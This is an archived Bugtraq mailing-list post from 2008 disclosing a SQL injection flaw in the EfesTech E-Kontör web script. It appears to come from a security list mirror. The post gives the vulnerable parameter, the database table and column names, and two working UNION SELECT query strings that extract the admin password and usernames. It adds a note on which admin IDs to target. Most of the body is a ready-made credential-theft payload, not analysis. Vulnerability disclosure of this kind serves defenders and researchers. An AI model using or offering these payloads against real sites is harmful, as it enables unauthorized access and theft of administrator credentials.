Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos

Bugtraq: EfesTech E-Kontr (id) Remote SQL INJECTION

EfesTech E-Kontr (id) Remote SQL INJECTION

From: <dj_remix_20_at_hotmail.com>
Date: 23 Mar 2008 15:25:38 -0000
('binary' encoding is not supported, stored as-is) ##############################################################

$Author = RMx
$home page = www.coderx.org
$thanks = Dynamic , TR_IP , Liz0zim
$Script name = Efestech E-Kontör (tr)
$script test = http://www.aspindir.com/Goster/5145
$script sales = 750 YTL

##############################################################
// EfesTech E-Kontör (id) Remote SQL INJECTION

// Table names

id no = id
password : sifre
users = firma

exploit for password = ?id=-1%20union+select+0,sifre,2,3+from+admin+where+id=1
explot for usernames = ?id=-1%20union+select+0,firma,2,3+from+admin+where+id=1

NOTe = &#304;D values 1 or 2 for admin

Bye
Received on Mar 24 2008

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]